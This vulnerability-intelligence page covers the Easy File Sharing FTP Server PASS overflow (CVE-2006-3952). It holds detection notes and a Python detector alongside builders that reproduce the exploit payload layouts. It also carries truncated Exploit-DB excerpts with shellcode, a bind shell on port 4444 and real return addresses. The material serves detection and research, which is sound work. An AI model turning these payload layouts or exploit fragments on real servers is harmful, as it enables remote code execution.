CVE-2006-3952
Published: 2006-08-01
Priority: P3 · 56 · Severity: high · CVSS 2.0 base score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Public exploit: yes · EPSS: 67.07% (99.2nd percentile)
Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efs_software | efs_ftp_server | — | — |
Detection & IOCs (extracted from sources)
Byte patterns seen in the public exploits:
- \x2c followed by NOP sled (0x90 * 2571) + shellcode + EIP
- \x2c + rand_text_english(2559) + \xeb\x12 + make_nops(2) + [target.ret].pack('V') + payload.encoded
- \x2c + 'A'*2559 + \xeb\x19\x90\x90 + struct.pack('<I', 0x10017F21) + \x90*30 + shellcode
Detection notes:
- Detect exploitation attempts by monitoring FTP PASS commands whose argument is 2559 bytes or longer, particularly those beginning with byte 0x2c.
- FTP banner check: if the server banner contains 'Easy File Sharing FTP Server', the service is potentially vulnerable.
- The public exploits send USER anonymous followed by the oversized PASS; the overflow is triggered while the server processes the password, so no credentials beyond the anonymous username are needed. Monitor for USER anonymous followed by an oversized PASS command.
- Every public exploit starts the PASS argument with byte 0x2c; combined with the length condition (a bare comma is not suspicious on its own) it can serve as a signature byte in network detection rules.
- Winny Thomas's exploit binds a shell on TCP port 4444. Monitor for the FTP server process opening a listener on TCP 4444 and for inbound connections to it; a reverse-shell payload would instead show up as an unexpected outbound connection from the server process.
- The filler before the overwrite is consistent across exploits: 2559 bytes ahead of the nSEH/SEH overwrite in the SEH-based exploits (handler address at offset 2564 of the PASS argument) and 2571 NOPs ahead of the saved EIP in the original PoC (EIP at offset 2572). A PASS argument of this length or greater is anomalous and should be alerted on.
Exploitation notes:
- Return addresses are OS/SP-specific; the exploit must be tuned per target platform. Three distinct RET values are documented across exploits.
- Payload bad characters must be avoided; the Metasploit module documents the full bad character set for encoder selection.
- The original PoC was tested only on Windows XP SP2 Polish; reliability on other locales/service packs requires different RET addresses.
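As an added example (not code from any of the exploits on this page, written in Python to match them), the detection checks listed above run over constructed FTP session lines, alongside builders that reproduce the three documented PASS layouts so the 2559/2571 filler lengths can be checked and the detector exercised offline. The 0xDEADBEEF ret value, the 0xCC stub shellcode, the sample sessions and the bad-character set are assumptions of this example, not values from the page.

```python
import struct

# Layout constants taken from the exploits quoted on this page.
FILLER_EIP = 2571            # h07 2006 PoC: 0x2c + NOP*2571 + saved EIP
FILLER_SEH = 2559            # SEH exploits: 0x2c + 2559 bytes + nSEH + SEH handler
SIGNATURE_BYTE = b"\x2c"     # first byte of the PASS argument in every public exploit
MIN_SUSPICIOUS_LEN = 2559    # alert on PASS arguments at least this long
BANNER_MARK = b"Easy File Sharing FTP Server"
# Assumed bad characters for a CRLF-terminated FTP command; the real list in
# the Metasploit module is not reproduced on this page.
BAD_CHARS = b"\x00\x0a\x0d"


def bad_chars_present(payload, bad=BAD_CHARS):
    """Return the bad-character values (as ints) that occur in payload."""
    return {b for b in bad if b in payload}


def build_eip_layout(ret, shellcode):
    """Shape of the original 2006 PoC: 0x2c, a 2571-byte sled, saved EIP.
    The PoC only documents the sled length; placing the shellcode at the
    end of the sled is this example's assumption."""
    sled = b"\x90" * (FILLER_EIP - len(shellcode)) + shellcode
    return SIGNATURE_BYTE + sled + struct.pack("<I", ret)


def build_seh_layout(ret, shellcode, nseh=b"\xeb\x12\x90\x90"):
    """Shape of the SEH-based exploits: 0x2c, 2559 bytes of filler, nSEH
    (short jmp over the handler, padded with NOPs), SEH handler address
    (pop/pop/ret), a 30-byte NOP pad, then the shellcode."""
    return (SIGNATURE_BYTE + b"A" * FILLER_SEH + nseh
            + struct.pack("<I", ret) + b"\x90" * 30 + shellcode)


def overwrite_offset(payload, ret):
    """Offset of the little-endian ret value inside the PASS argument,
    i.e. the number Metasploit's pattern_offset would report."""
    return payload.index(struct.pack("<I", ret))


def scan_session(lines):
    """Inspect one FTP session given as (direction, line) pairs: direction
    'S' for server->client, 'C' for client->server; line is the raw bytes
    without CRLF.  Returns a list of findings (empty == nothing seen)."""
    findings = []
    last_user = None
    for direction, line in lines:
        if direction == "S":
            if BANNER_MARK in line:
                findings.append("banner: Easy File Sharing FTP Server")
            continue
        verb, _, arg = line.partition(b" ")
        verb = verb.upper()
        if verb == b"USER":
            last_user = arg.strip().lower()
        elif verb == b"PASS" and len(arg) >= MIN_SUSPICIOUS_LEN:
            tags = ["oversized PASS (%d bytes)" % len(arg)]
            if arg.startswith(SIGNATURE_BYTE):
                tags.append("starts with 0x2c")
            if last_user == b"anonymous":
                tags.append("after USER anonymous")
            findings.append(", ".join(tags))
    return findings


# Constructed sample sessions (not captured traffic).  0xDEADBEEF stands in
# for a real ret / pop-pop-ret address and 0xCC bytes stand in for shellcode.
STUB_SHELLCODE = b"\xcc" * 32
BENIGN_SESSION = [
    ("S", b"220 Easy File Sharing FTP Server"),
    ("C", b"USER alice"),
    ("C", b"PASS hunter2"),
]
ATTACK_SESSION = [
    ("S", b"220 Easy File Sharing FTP Server"),
    ("C", b"USER anonymous"),
    ("C", b"PASS " + build_seh_layout(0xDEADBEEF, STUB_SHELLCODE)),
]

if __name__ == "__main__":
    for name, session in (("benign", BENIGN_SESSION), ("attack", ATTACK_SESSION)):
        print(name, scan_session(session))
    eip = build_eip_layout(0xDEADBEEF, STUB_SHELLCODE)
    seh = build_seh_layout(0xDEADBEEF, STUB_SHELLCODE)
    print("EIP offset:", overwrite_offset(eip, 0xDEADBEEF))   # 2572
    print("SEH offset:", overwrite_offset(seh, 0xDEADBEEF))   # 2564
    print("bad chars in SEH layout:", bad_chars_present(seh))
```

The detector keys on the three signals the notes above describe (length, leading 0x2c, preceding USER anonymous) rather than on any single byte, because a comma-initial password of ordinary length is legitimate; the banner check is a separate, weaker indicator that only says the service family is present.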
No detection rules found.
Exploit-DB
Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow (exploitdb · 2014-05-27 · CVE-2006-3952 · CVSS 7.5, HIGH)
---
#!/usr/bin/env python
# Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow
# Date: 27 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vulnerability discovered by: h07
# CVE: CVE-2006-3952
# OSVDB: 27646
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.efssoft.com/ftpserver.htm
# Version: 3.5
# Tested on: Windows 8.1 Enterprise , English
# : Windows 7 Enterprise SP1, English
# : Windows XP SP3, English
#
# Description:
# A buffer overflow is triggered when a large password is sent to the
# server.
#
# h07 found this bug in 2006, targeting EFS FTP Server 2.0. The original
# exploits relied on OS DLLs to reference a pop/pop/retn address to leverage a
# SEH
Exploit-DB
Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit) (exploitdb · 2010-05-09 · CVE-2006-3952)
---
##
# $Id: easyfilesharing_pass.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Easy File Sharing 2.0
        service. By sending an overly long password, an attacker can execute
        arbitrary code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9262 $',
      'References'     =>
        [
          [ 'CVE', '2006-3952' ],
          [ 'OSVDB', '
Exploit-DB
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow (exploitdb · 2007-03-26 · CVE-2006-3952)
---
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for Windows XP SP2 (Polish version) was
# provided. This exploit was tested on Windows 2000 Server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42
Exploit-DB
Easy File Sharing FTP Server 2.0 - 'PASS' Remote (exploitdb · 2006-08-21 · CVE-2006-3952)
---
#!/usr/bin/python
#Easy File Sharing FTP Server 2.0 (PASS) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Bug found by h07
#Tested on XP SP2 Polish
#Date: 28.07.2006
#
#BUFF([PASS + 0x20]+[0x2c]+[NOP * 2571]+[0x41414141]+[\r\n])
#EIP = 0x41414141
host = "127.0.0.1"
port = 21
len_recv = 1024
user_name = "anonymous"
NOP_LEN = 2571
EIP = 0x77AB367B #popad pop ret (CRYPT32.DLL) XP SP2 Polish
from socket import *
shellcode = ( #execute calc.exe
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\x
Metasploit
Easy File Sharing FTP Server 2.0 PASS Overflow (metasploit)
This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.
No writeups or analysis indexed.
References
http://secunia.com/advisories/21289
http://www.osvdb.org/27646
http://www.securityfocus.com/bid/19243
http://www.vupen.com/english/advisories/2006/3068
https://exchange.xforce.ibmcloud.com/vulnerabilities/28084